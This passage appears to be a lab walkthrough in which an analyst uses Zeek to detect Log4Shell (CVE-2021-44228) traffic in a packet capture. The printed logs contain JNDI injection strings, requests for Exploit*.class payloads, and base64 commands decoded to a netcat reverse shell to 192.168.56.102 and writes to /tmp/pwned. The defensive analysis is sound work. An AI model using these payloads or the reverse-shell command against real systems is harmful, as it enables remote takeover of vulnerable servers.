1640023652.008511 Ckl0FV3jumRTSjCk37 172.17.0.1 60316 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FZiMgW29483QEvS57h - text/plain
1640025510.063581 CVW1x93htcyS2qlsaf 172.17.0.1 60318 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 435 400 (empty) - - (empty) - - - - - - FQJTPb2FVAOerMJdh7 - text/html
1640025554.667458 COvB5D4kdBsF0OAjGg 172.17.0.2 51834 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitSMMZvT8GXL.class - 1.1 Java/1.8.0_181 - 0 1221 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fz7ckavJbacqKLihd - application/x-java-applet
1640025554.661073 CiHHhm4BncLehOzMN3 172.17.0.1 60320 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FItcX62GLQzrl4Cbzf - text/plain
1640026858.968993 C5kyKu3m6RIbCUqXd9 172.17.0.2 51836 192.168.56.102 443 1 GET 192.168.56.102:443 /Exploit6HHc3BcVzI.class - 1.1 Java/1.8.0_181 - 0 1236 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - FlPEpD1E3EAvvgGJpj - application/x-java-applet
1640026858.960398 CWFbla33TCz3r1OGOa 172.17.0.1 60324 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - Fl61wz3Ge2v4C7LYI4 - text/plain
1640027823.052868 C0AIBt146FDQqZgrsc 172.17.0.1 60326 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FRCUNW1if8EiKUkky2 - text/plain
1640027823.066566 Ck73J33j2cnDW3d1Le 172.17.0.1 60330 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 ${jndi:ldap://127.0.0.1:1389} - 0 91 400(empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvFr0m3lUQZBzNEDGg - text/json
1640027823.072191 CTHREk1CtzRIg0iWt8 172.17.0.1 60334 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FjiVHw36zI70gLb9wi - text/json
1640027823.077510 CnHDGlNx3DEdaUg6b 172.17.0.1 60338 172.17.0.2 8080 1 GET 172.17.0.2:8080 / ${jndi:ldap://127.0.0.1:1389} 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvR55t24LnhgxI14G3 - text/json
root@thm:~$ cat http.log | zeek-cut user_agent
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the http.log file. What is the extension of the exploit file?
root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek log4shell.pcapng
root@thm:~$ cat detection-log4j.zeek
# Load scan-NG Package!
@load /opt/zeek/share/zeek/site/cve-2021-44228
root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek http.log log4shell.pcapng packet_filter.log weird.log
conn.log files.log log4j.log notice.log signatures.log
root@thm:~$ head -n 20 http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string]vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1640023505.960608 C46qhk4zZ9Oa6yAoY4 172.17.0.1 60314 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 91 400 (empty) - - (empty) - - - - - - Fq5jbu3EpCk5tV3f18 - text/json
1640023652.119439 CFZWci2SfK49pWcMq4 172.17.0.2 51832 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitQ8v7ygBW4i.class - 1.1 Java/1.8.0_181 - 0 1216 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fm2Pk636DiMArmDn03 - application/x-java-applet
1640023652.008511 Ckl0FV3jumRTSjCk37 172.17.0.1 60316 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FZiMgW29483QEvS57h - text/plain
1640025510.063581 CVW1x93htcyS2qlsaf 172.17.0.1 60318 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 435 400 (empty) - - (empty) - - - - - - FQJTPb2FVAOerMJdh7 - text/html
1640025554.667458 COvB5D4kdBsF0OAjGg 172.17.0.2 51834 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitSMMZvT8GXL.class - 1.1 Java/1.8.0_181 - 0 1221 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fz7ckavJbacqKLihd - application/x-java-applet
1640025554.661073 CiHHhm4BncLehOzMN3 172.17.0.1 60320 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FItcX62GLQzrl4Cbzf - text/plain
1640026858.968993 C5kyKu3m6RIbCUqXd9 172.17.0.2 51836 192.168.56.102 443 1 GET 192.168.56.102:443 /Exploit6HHc3BcVzI.class - 1.1 Java/1.8.0_181 - 0 1236 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - FlPEpD1E3EAvvgGJpj - application/x-java-applet
1640026858.960398 CWFbla33TCz3r1OGOa 172.17.0.1 60324 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - Fl61wz3Ge2v4C7LYI4 - text/plain
1640027823.052868 C0AIBt146FDQqZgrsc 172.17.0.1 60326 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FRCUNW1if8EiKUkky2 - text/plain
1640027823.066566 Ck73J33j2cnDW3d1Le 172.17.0.1 60330 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 ${jndi:ldap://127.0.0.1:1389} - 0 91 400(empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvFr0m3lUQZBzNEDGg - text/json
1640027823.072191 CTHREk1CtzRIg0iWt8 172.17.0.1 60334 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FjiVHw36zI70gLb9wi - text/json
1640027823.077510 CnHDGlNx3DEdaUg6b 172.17.0.1 60338 172.17.0.2 8080 1 GET 172.17.0.2:8080 / ${jndi:ldap://127.0.0.1:1389} 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvR55t24LnhgxI14G3 - text/json
root@thm:~$ cat http.log | zeek-cut uri | sort | uniq
/
/Exploit6HHc3BcVzI.class
/ExploitQ8v7ygBW4i.class
/ExploitSMMZvT8GXL.class
/testing1
/testing123
testing1Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the log4j.log file. Decode the base64 commands. What is the name of the created file?
root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek log4shell.pcapng
root@thm:~$ cat detection-log4j.zeek
# Load scan-NG Package!
@load /opt/zeek/share/zeek/site/cve-2021-44228
root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek http.log log4shell.pcapng packet_filter.log weird.log
conn.log files.log log4j.log notice.log signatures.log
root@thm:~$ head -n 20 log4j.log
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1640023652.008511 Ckl0FV3jumRTSjCk37 / 192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= 192.168.56.102:389 192.168.56.102 389 GET T X-API-VERSION ${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=} F T
1640025554.661073 CiHHhm4BncLehOzMN3 / 192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg== 192.168.56.102:389 192.168.56.102 389 GET T X-API-VERSION ${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==} F T
1640026858.960398 CWFbla33TCz3r1OGOa / 192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg== 192.168.56.102:389 192.168.56.102 389 GET T X-API-VERSION ${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==} F T
1640027823.052868 C0AIBt146FDQqZgrsc / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T X-API-VERSION ${jndi:ldap://127.0.0.1:1389} F T
1640027823.066566 Ck73J33j2cnDW3d1Le / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T USER-AGENT ${jndi:ldap://127.0.0.1:1389} F T
1640027823.072191 CTHREk1CtzRIg0iWt8 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T COOKIE ${jndi:ldap://127.0.0.1:1389} F T
1640027823.077510 CnHDGlNx3DEdaUg6b / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T REFERER ${jndi:ldap://127.0.0.1:1389} F T
1640027823.089508 CHEJYb2xPpVeg4qKL6 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T ACCEPT-LANGUAGE ${jndi:ldap://127.0.0.1:1389} F T
1640027823.094029 CNQqim3QxR3vjdrRsb / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T ACCEPT-ENCODING ${jndi:ldap://127.0.0.1:1389} F T
1640027823.095902 ChqYJG3NwzJd7ncOf8 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T UPGRADE-INSECURE-REQUESTS ${jndi:ldap://127.0.0.1:1389} F T
1640027823.097732 CJGWVF4QqmB0rLjJn9 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T ACCEPT ${jndi:ldap://127.0.0.1:1389} F T
1640027823.099709 C2eIJ04Slboqx3m8e2 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T UPGRADE-INSECURE-REQUESTS ${jndi:ldap://127.0.0.1:1389} F T
root@thm:~$ cat log4j.log | zeek-cut uri | sort | uniq
127.0.0.1:1389
192.168.56.102
192.168.56.102:389
192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==
192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==
192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
192.168.56.102:389/test
root@thm:~$ echo -n "bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==" | base64 -d
nc 192.168.56.102 80 -e /bin/sh -vvv
root@thm:~$ echo -n "d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==" | base64 -d
which nc > /tmp/pwned
root@thm:~$ echo -n "dG91Y2ggL3RtcC9wd25lZAo=" | base64 -d
touch /tmp/pwnedLast updated